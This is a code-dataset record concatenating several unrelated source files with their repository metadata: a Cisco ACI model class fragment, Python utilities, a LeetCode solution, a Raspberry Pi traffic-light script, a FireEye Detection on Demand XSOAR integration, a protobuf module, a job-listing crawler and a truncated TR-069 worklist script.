prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("speedThr", prop)
prop = PropMeta("str", "speedTr", "speedTr", 8269, PropCategory.IMPLICIT_TREND)
prop.label = "speed trend"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTr", prop)
prop = PropMeta("str", "speedTrBase", "speedTrBase", 8268, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "speed trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTrBase", prop)
prop = PropMeta("str", "speedTtl", "speedTtl", 8266, PropCategory.IMPLICIT_TOTAL)
prop.label = "speed total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTtl", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("EqptSlotToEPg", "EPG", "cobra.model.fv.EPg"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
26abe393261a86288211f6bc9fd241563a9b60ce | 119a85a388fe436361530fbb47932e704d749557 | /PEAK-0.5a4dev_r2085/build/lib.macosx-10.6-x86_64-2.7/peak/util/signature.py | dbd8a3fbf7c6e8f609c9564bba8de27bd211ea3d | [
"Python-2.0"
] | permissive | chrisrgunn/cs156project | 014d5b05c6bf0e08ab8bd0dea525057d0e65b9a7 | e5414a37f9793c8b0674695b948482b559b18ea6 | refs/heads/master | 2021-01-19T14:09:49.046539 | 2017-05-24T02:10:29 | 2017-05-24T02:10:29 | 88,128,762 | 0 | 2 | null | 2017-05-04T23:49:09 | 2017-04-13T05:36:10 | Python | UTF-8 | Python | false | false | 1,270 | py | """Crude introspection of call signatures"""
import protocols; from protocols import adapt, Interface
from inspect import getargspec
from types import FunctionType, MethodType
__all__ = 'ISignature', 'getPositionalArgs'
class ISignature(Interface):
# XXX There should be a lot more here than this...
def getPositionalArgs():
"""Return a sequence of positional argument names"""
def getCallable():
"""Return the callable object"""
class FunctionAsSignature(protocols.Adapter):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[FunctionType]
)
def getPositionalArgs(self):
return getargspec(self.subject)[0]
def getCallable(self):
return self.subject
class MethodAsSignature(FunctionAsSignature):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[MethodType]
)
def __init__(self, ob):
self.funcSig = adapt(ob.im_func, ISignature)
self.offset = ob.im_self is not None
self.subject = ob
def getPositionalArgs(self):
return self.funcSig.getPositionalArgs()[self.offset:]
def getPositionalArgs(ob):
return adapt(ob,ISignature).getPositionalArgs()
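
if __name__ == '__main__':
    # Illustrative sketch: adapt a plain function to ISignature and list its
    # positional argument names.
    def example(a, b, c=1):
        pass
    print(getPositionalArgs(example))  # expected: ['a', 'b', 'c']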
| [
"[email protected]"
] | |
4cf2a8b84c3cdd0ebae529ac5397255b44f2e9ee | 5f2103b1083b088aed3f3be145d01a770465c762 | /406. Queue Reconstruction by Height.py | 54dbb0fb8a1dbe5530f49b27d210c81d690d7a0e | [] | no_license | supersj/LeetCode | 5605c9bcb5ddcaa83625de2ad9e06c3485220019 | 690adf05774a1c500d6c9160223dab7bcc38ccc1 | refs/heads/master | 2021-01-17T17:23:39.585738 | 2017-02-27T15:08:42 | 2017-02-27T15:08:42 | 65,526,089 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | from operator import itemgetter
# Greedy insertion: place people tallest-first (ties broken by smaller k first);
# inserting each person at index k is then always valid, because everyone
# already placed is at least as tall.
class Solution1(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = itemgetter(1,0))
result = []
start = 0
for ele in people:
if ele[1] == 0:
result.append(ele)
start += 1
else:
break
_last = start
_lastlevel = 0
for i in range(start,len(people)):
cnt = people[i][1]
if cnt != _lastlevel:
_last = 0
_lastlevel = cnt
_index = 0
for num in result:
if cnt == 0:
break
if num[0] >= people[i][0]:
cnt -= 1
_index += 1
_last = max(_last+1,_index)
result.insert(_last,people[i])
return result
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = lambda x: x[1])
people.sort(key = lambda x: x[0],reverse= True)
result = []
print(people)
for ele in people:
result.insert(ele[1],ele)
return result
p = [[8,2],[4,2],[4,5],[2,0],[7,2],[1,4],[9,1],[3,1],[9,0],[1,0]]
hh = Solution()
print(hh.reconstructQueue(p))
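# For the sample input above, the greedy insertion yields:
# [[1,0],[2,0],[9,0],[3,1],[1,4],[9,1],[4,2],[7,2],[8,2],[4,5]]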
"[email protected]"
] | |
a52de2fb1424ea5d399877b53b6f048575a62dee | c7a1c1ae40e9d95dfb92251dcfbf3c5010e6ba81 | /essentials-gpiozero/02-LEDBasics/ch2listing4.py | 182bec077a8cdc43f6efc791966c9e6f6b7cdd87 | [] | no_license | pranavlathigara/Raspberry-Pi-DIY-Projects | efd18e2e5b9b8369bb1a5f5418782480cf9bc729 | 0c14c316898d4d06015912ac4a8cb7b71a3980c0 | refs/heads/master | 2021-04-06T09:14:28.088223 | 2018-02-19T00:15:22 | 2018-02-19T00:15:22 | 124,649,553 | 1 | 2 | null | 2018-03-10T11:30:59 | 2018-03-10T11:30:59 | null | UTF-8 | Python | false | false | 953 | py | from gpiozero import TrafficHat
from time import sleep
th = TrafficHat()
try:
while True:
# Traffic light code
# First, turn the green LED on
th.lights.green.on()
        print("Press the button to stop the lights!")
# Next, we want to wait until the button is pressed
        while not th.button.is_pressed:
            # While not pressed, do nothing
            pass
# Button has been pressed!
th.lights.green.off()
# Amber on for a couple of seconds
th.lights.amber.on()
sleep(2)
th.lights.amber.off()
# Turn the red on
th.lights.red.on()
# Buzz the buzzer 20 times with 0.1 second intervals
th.buzzer.blink(0.1,0.1,20,False)
sleep(1)
th.lights.red.off()
# Red off and blink amber 4 times with 0.5 second intervals
th.lights.amber.blink(0.5,0.5,4,False)
except KeyboardInterrupt:
exit() | [
"[email protected]"
] | |
5e97ee335b85ed1562ba97122a365eef2a05f7ff | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/FireEye-Detection-on-Demand/Integrations/FireEye-Detection-on-Demand/FireEye-Detection-on-Demand.py | b969be415dd9b367021b7757c9c76ce0e0c6acb4 | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 15,153 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
from typing import Any, Dict, List, Optional, Tuple
import dateparser
import urllib3
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
    No special attributes are defined for this implementation.
    """
def get_file_reputation(self, file: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/hashes/{file}'
)
def get_health(self) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix='/health'
)
def submit_file(self, files: Dict[str, Any], data: Dict[str, Any]) -> Dict[str, Any]:
return self._http_request(
method='POST',
url_suffix='/files',
files=files,
data=data
)
def submit_urls(self, data: Dict[str, Any]) -> Dict[str, Any]:
return self._http_request(
method='POST',
url_suffix='/urls',
files=data,
data=None
)
def get_report_url(self, report_id: str, expiration: int) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/presigned-url/{report_id}',
params={
'expiry': expiration
}
)
def report_status(self, report_id: str, extended: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/reports/{report_id}',
params={
'extended': extended
}
)
def report_artifact(self, report_id: str, artifact_type: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/artifacts/{report_id}',
params={
'type': artifact_type,
},
resp_type='content'
)
''' HELPER FUNCTIONS '''
def convert_to_demisto_severity(severity: str) -> int:
# In this case the mapping is straightforward, but more complex mappings
# might be required in your integration, so a dedicated function is
# recommended. This mapping should also be documented.
return {
'Low': 1, # low severity
'Medium': 2, # medium severity
'High': 3, # high severity
'Critical': 4 # critical severity
}[severity]
def arg_to_int(arg: Any, arg_name: str, required: bool = False) -> Optional[int]:
if arg is None:
if required is True:
raise ValueError(f'Missing "{arg_name}"')
return None
if isinstance(arg, str):
if arg.isdigit():
return int(arg)
raise ValueError(f'Invalid number: "{arg_name}"="{arg}"')
if isinstance(arg, int):
return arg
raise ValueError(f'Invalid number: "{arg_name}"')
def arg_to_timestamp(arg: Any, arg_name: str, required: bool = False) -> Optional[int]:
if arg is None:
if required is True:
raise ValueError(f'Missing "{arg_name}"')
return None
if isinstance(arg, str) and arg.isdigit():
# timestamp is a str containing digits - we just convert it to int
return int(arg)
if isinstance(arg, str):
# we use dateparser to handle strings either in ISO8601 format, or
# relative time stamps.
# For example: format 2019-10-23T00:00:00 or "3 days", etc
date = dateparser.parse(arg, settings={'TIMEZONE': 'UTC'})
if date is None:
# if d is None it means dateparser failed to parse it
raise ValueError(f'Invalid date: {arg_name}')
return int(date.timestamp())
if isinstance(arg, (int, float)):
# Convert to int if the input is a float
return int(arg)
raise ValueError(f'Invalid date: "{arg_name}"')
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
# INTEGRATION DEVELOPER TIP
# Client class should raise the exceptions, but if the test fails
# the exception text is printed to the Cortex XSOAR UI.
# If you have some specific errors you want to capture (i.e. auth failure)
# you should catch the exception here and return a string with a more
# readable output (for example return 'Authentication Error, API Key
# invalid').
# Cortex XSOAR will print everything you return different than 'ok' as
# an error
try:
#
client.get_health()
except DemistoException as e:
if 'Forbidden' in str(e):
return 'Authorization Error: make sure API Key is correctly set'
else:
raise e
return 'ok'
def get_hashes_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, Any]:
hashes = argToList(args.get('md5_hashes'))
if len(hashes) == 0:
raise ValueError('hash(es) not specified')
for hash in hashes:
if md5Regex.match(hash):
continue
raise Exception('Invalid hash. Only MD5 is supported.')
dbot_score_list: List[Dict[str, Any]] = []
file_standard_list: List[Dict[str, Any]] = []
file_data_list: List[Dict[str, Any]] = []
for hash in hashes:
file_data = client.get_file_reputation(hash)
file_data['MD5'] = file_data['md5']
del file_data['md5']
# demisto.results(file_data)
engines = file_data.get('engine_results', {})
for key in engines.keys():
if engines[key].get('sha256'):
file_data['SHA256'] = engines[key].get('sha256')
del engines[key]['sha256']
# If the outer `is_malicious` is set to True, assume the score should be bad
# Otherwise, default to unknown unless at least one engine has returned a verdict besides `not_found`
if file_data['is_malicious']:
score = 3 # bad
else:
score = 0 # unknown
for key in engines.keys():
verdict = engines[key].get('verdict', 'not_found')
if verdict != "not_found" and verdict != "malicious":
score = 1 # good
break
dbot_score = {
'Indicator': hash,
'Vendor': 'FireEye DoD',
'Type': 'file',
'Score': score
}
file_standard_context = {
'MD5': hash,
}
if score == 3:
# if score is bad must add DBotScore Vendor and Description
file_standard_context['Malicious'] = {
'Vendor': 'FireEye DoD'
}
filedata = {}
filedata['FireEyeDoD'] = file_data
filedata['MD5'] = file_data['MD5']
del filedata['FireEyeDoD']['MD5']
if file_data.get('SHA256'):
dbot_score_sha256 = {
'Indicator': file_data.get('SHA256'),
'Vendor': 'FireEye DoD',
'Type': 'file',
'Score': score
}
dbot_score_list.append(dbot_score_sha256)
filedata['SHA256'] = file_data['SHA256']
file_standard_context['SHA256'] = file_data['SHA256']
del filedata['FireEyeDoD']['SHA256']
file_standard_list.append(file_standard_context)
dbot_score_list.append(dbot_score)
file_data_list.append(filedata)
outputs = {
'DBotScore(val.Vendor == obj.Vendor && val.Indicator == obj.Indicator)': dbot_score_list,
outputPaths['file']: file_standard_list,
'File(val.MD5 == obj.MD5 || val.SHA256 == obj.SHA256)': file_data_list
}
readable_output = tableToMarkdown('FireEye DoD Results', file_standard_list, headers=["MD5", "SHA256", "Malicious"])
return (
readable_output,
outputs,
file_data_list
)
def generate_report_url(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
report_id = str(args.get('report_id'))
expiration = arg_to_int(arg=args.get('expiration'), arg_name='expiration', required=True)
if expiration:
if expiration < 1 or expiration > 8760:
raise ValueError('Expiration must be between 1 and 8760 hours.')
else:
raise ValueError('Expiration not specified or not a number.')
report = client.get_report_url(report_id=report_id, expiration=expiration)
presigned_report_url = report.get('presigned_report_url')
readable_output = f'Report {report_id} is available [here]({presigned_report_url})'
return (
readable_output,
{},
report
)
def submit_file_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
entry_id = demisto.args().get('entryID')
file_entry = demisto.getFilePath(entry_id) # .get('path')
file_name = file_entry['name']
file_path = file_entry['path']
files = {'file': (file_name, open(file_path, 'rb'))}
# Optional parameters to send along with the file
optional_params = ['password', 'param', 'screenshot', 'video', 'fileExtraction', 'memoryDump', 'pcap']
data = {}
for param in optional_params:
value = demisto.args().get(param)
if value:
data[param] = value
scan = client.submit_file(files=files, data=data)
scan['filename'] = file_name
del scan['status']
scan['overall_status'] = 'RUNNING'
report_id = scan.get('report_id')
readable_output = (
f'Started analysis of {file_name} with FireEye Detection on Demand.'
f'Results will be published to report id: {report_id}'
)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': scan
}
return (
readable_output,
outputs,
scan
)
def submit_urls_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
urls = argToList(args.get('urls'))
if len(urls) == 0:
        raise ValueError('url(s) not specified')
# Format the URLs into a string list, which the API understands
formatted_urls = "[" + ",".join(list(map(lambda url: url.replace(url, f'"{url}"'), urls))) + "]"
data = {'urls': formatted_urls}
scan = client.submit_urls(data=data)
del scan['status']
scan['overall_status'] = 'RUNNING'
report_id = scan.get('report_id')
readable_output = (
f'Started analysis of {urls} with FireEye Detection on Demand.'
f'Results will be published to report id: {report_id}'
)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': scan
}
return (
readable_output,
outputs,
scan
)
def get_reports_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, Any]:
report_id_list = argToList(args.get('report_ids', []))
extended = args.get('extended_report', "False")
screenshot = args.get('get_screenshot', "false")
artifact = args.get('get_artifact', "")
if len(report_id_list) == 0:
raise ValueError('report_id(s) not specified')
report_list: List[Dict[str, Any]] = []
for report_id in report_id_list:
report = client.report_status(report_id=report_id, extended=extended)
if screenshot.lower() == "true":
screenshot = client.report_artifact(report_id=report_id, artifact_type="screenshot")
stored_img = fileResult('screenshot.gif', screenshot)
demisto.results({'Type': entryTypes['image'], 'ContentsFormat': formats['text'],
'File': stored_img['File'], 'FileID': stored_img['FileID'], 'Contents': ''})
if artifact != "":
artifacts = client.report_artifact(report_id=report_id, artifact_type=artifact)
stored_artifacts = fileResult('artifacts.zip', artifacts)
demisto.results({'Type': entryTypes['file'], 'ContentsFormat': formats['text'],
'File': stored_artifacts['File'], 'FileID': stored_artifacts['FileID'], 'Contents': ''})
report_list.append(report)
readable_output = tableToMarkdown('Scan status', report_list)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': report_list
}
return (
readable_output,
outputs,
report_list
)
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
api_key = demisto.params().get('apikey')
# get the service API url
base_url = demisto.params()['url']
# if your Client class inherits from BaseClient, SSL verification is
# handled out of the box by it, just pass ``verify_certificate`` to
# the Client constructor
verify_certificate = not demisto.params().get('insecure', False)
# if your Client class inherits from BaseClient, system proxy is handled
# out of the box by it, just pass ``proxy`` to the Client constructor
proxy = demisto.params().get('proxy', False)
# INTEGRATION DEVELOPER TIP
# You can use functions such as ``demisto.debug()``, ``demisto.info()``,
# etc. to print information in the XSOAR server log. You can set the log
# level on the server configuration
# See: https://xsoar.pan.dev/docs/integrations/code-conventions#logging
demisto.debug(f'Command being called is {demisto.command()}')
try:
headers = {
'feye-auth-key': f'{api_key}'
}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == 'fireeye-dod-get-hashes':
return_outputs(*get_hashes_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-get-reports':
return_outputs(*get_reports_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-submit-file':
return_outputs(*submit_file_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-submit-urls':
return_outputs(*submit_urls_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-get-report-url':
return_outputs(*generate_report_url(client, demisto.args()))
    # Exceptions are re-raised as-is; the conventional XSOAR error handling is kept commented out below
except Exception as e:
raise e
# demisto.error(traceback.format_exc()) # print the traceback
# return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| [
"[email protected]"
] | |
1f330a243eabf5b8c046f3eeffcee642a856d548 | 0937646b6ce9249a8d193987f308ce398dc28bd1 | /104API/104API.py | 5ec24357b53855d4c9189223fbb28b268e8829ff | [] | no_license | barry800414/JobTitleNLP | 98622d02b25b1418f28698f7d772c8de96642032 | b379c2052447e6483d17f5db51fb918b37ac7a52 | refs/heads/master | 2021-06-08T19:36:39.044757 | 2016-10-21T03:11:10 | 2016-10-21T03:11:10 | 66,043,111 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,863 | py | #!/usr/bin/env python3
# invoke 104 API to get all 104 jobs
import sys
import requests
import json
from getCat import getL3ID
API_URL = "http://www.104.com.tw/i/apis/jobsearch.cfm"
def getJobsByCatID(catID, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J"
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 1:
print(r.url, r.status_code)
p = r.json()
nPage = int(p['TOTALPAGE'])
for i in range(0, nPage):
jobs.update(__getJobsByCatID(catID, i+1, verbose))
except Exception as e:
print(e, file=sys.stderr)
return jobs
def __getJobsByCatID(catID, page, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J,JOB,JOBCAT_DESCRIPT,NAME",
"page": page
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 2:
print(r.url, r.status_code)
p = r.json()
for d in p['data']:
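            # "類目" ("category") is a header token in JOBCAT_DESCRIPT; filter it out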
cat = [c for c in d['JOBCAT_DESCRIPT'].split('@') if c != "類目"]
jobs[d['J']] = { "title": d['JOB'], "cat": cat, 'company_name': d['NAME'] }
except Exception as e:
print(e, file=sys.stderr)
return jobs
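# Hypothetical direct call (the category id is a placeholder; real ids come from
# the getL3ID() mapping loaded in __main__ below):
# jobs = getJobsByCatID("2007001000", verbose=1)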
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage:', sys.argv[0], 'category outJsonFile', file=sys.stderr)
exit(-1)
with open(sys.argv[1], 'r') as f:
rawCat = json.load(f)
cat = getL3ID(rawCat)
# all job category ids
allJobs = dict()
for i, (catID, catName) in enumerate(cat.items()):
print('(%d/%d) Start crawling Category %s(%s):' % (i+1, len(cat), catName, catID), end='', flush=True)
jobs = getJobsByCatID(catID)
print('%d' % len(jobs), flush=True)
allJobs[catName] = jobs
with open(sys.argv[2], 'w') as f:
json.dump(allJobs, f, indent=1, ensure_ascii=False)
| [
"[email protected]"
] | |
a3ddfd87f910aeddaeb2fdccc180e2928ab42be7 | bc441bb06b8948288f110af63feda4e798f30225 | /object_store_sdk/model/notify/subscriber_pb2.py | 692c20775b418cfdc51ab0f6e6720297f4eb1271 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 5,376 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: subscriber.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_store_sdk.model.notify import subscribe_info_pb2 as object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='subscriber.proto',
package='notify',
syntax='proto3',
serialized_options=_b('[email protected]/contracts/protorepo-models/easyops/model/notify'),
serialized_pb=_b('\n\x10subscriber.proto\x12\x06notify\x1a\x32object_store_sdk/model/notify/subscribe_info.proto\"\xab\x01\n\nSubscriber\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05\x61\x64min\x18\x02 \x01(\t\x12\x10\n\x08\x63\x61llback\x18\x03 \x01(\t\x12\x0f\n\x07\x65nsName\x18\x04 \x01(\t\x12\x0f\n\x07procNum\x18\x05 \x01(\x05\x12\x0f\n\x07msgType\x18\x06 \x01(\x05\x12\r\n\x05retry\x18\x07 \x01(\x05\x12,\n\rsubscribeInfo\x18\x08 \x03(\x0b\x32\[email protected]/contracts/protorepo-models/easyops/model/notifyb\x06proto3')
,
dependencies=[object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2.DESCRIPTOR,])
_SUBSCRIBER = _descriptor.Descriptor(
name='Subscriber',
full_name='notify.Subscriber',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='notify.Subscriber.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='admin', full_name='notify.Subscriber.admin', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='notify.Subscriber.callback', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ensName', full_name='notify.Subscriber.ensName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='procNum', full_name='notify.Subscriber.procNum', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='msgType', full_name='notify.Subscriber.msgType', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retry', full_name='notify.Subscriber.retry', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribeInfo', full_name='notify.Subscriber.subscribeInfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=81,
serialized_end=252,
)
_SUBSCRIBER.fields_by_name['subscribeInfo'].message_type = object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2._SUBSCRIBEINFO
DESCRIPTOR.message_types_by_name['Subscriber'] = _SUBSCRIBER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Subscriber = _reflection.GeneratedProtocolMessageType('Subscriber', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBER,
'__module__' : 'subscriber_pb2'
# @@protoc_insertion_point(class_scope:notify.Subscriber)
})
_sym_db.RegisterMessage(Subscriber)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
40dcbecf7f281aed9dcb30300876afe764f694bd | 0c1d6b8dff8bedfffa8703015949b6ca6cc83f86 | /lib/worklists/operator/CT/v3.0/business/VDSL_4+2/WLAN_Multi/script.py | 9a9b6c6cbee9a6edf93585bdaa4fbf2b5d34cecf | [] | no_license | samwei8/TR069 | 6b87252bd53f23c37186c9433ce4d79507b8c7dd | 7f6b8d598359c6049a4e6cb1eb1db0899bce7f5c | refs/heads/master | 2021-06-21T11:07:47.345271 | 2017-08-08T07:14:55 | 2017-08-08T07:14:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,798 | py | #coding:utf-8
# -----------------------------rpc --------------------------
import os
import sys
DEBUG_UNIT = False
if (DEBUG_UNIT):
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1)
parent3 = os.path.dirname(parent2)
parent4 = os.path.dirname(parent3) # tr069v3\lib
parent5 = os.path.dirname(parent4) # tr069v3\
sys.path.insert(0, parent4)
sys.path.insert(0, os.path.join(parent4, 'common'))
sys.path.insert(0, os.path.join(parent4, 'worklist'))
sys.path.insert(0, os.path.join(parent4, 'usercmd'))
sys.path.insert(0, os.path.join(parent5, 'vendor'))
from TR069.lib.common.event import *
from TR069.lib.common.error import *
from time import sleep
import TR069.lib.common.logs.log as log
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1) # dir is system
try:
i = sys.path.index(parent2)
if (i !=0):
            # strategy: boost precedence (move parent2 to the front of sys.path)
sys.path.pop(i)
sys.path.insert(0, parent2)
except Exception,e:
sys.path.insert(0, parent2)
import _Common
reload(_Common)
from _Common import *
import _WLANMulti
reload(_WLANMulti)
from _WLANMulti import WLANMulti
import _WLANMultiWANSetUP
reload(_WLANMultiWANSetUP)
from _WLANMultiWANSetUP import WLANMultiWANSetUP
def test_script(obj):
"""
"""
    sn = obj.sn # get the SN (serial number)
    DeviceType = "VDSL" # TR-069 template type to bind; only ADSL\LAN\EPON are supported
    rollbacklist = [] # instances to delete on rollback when the worklist fails; rollback is disabled by default
    # initialize the log
    obj.dict_ret.update(str_result=u"Start executing worklist: %s........\n" %
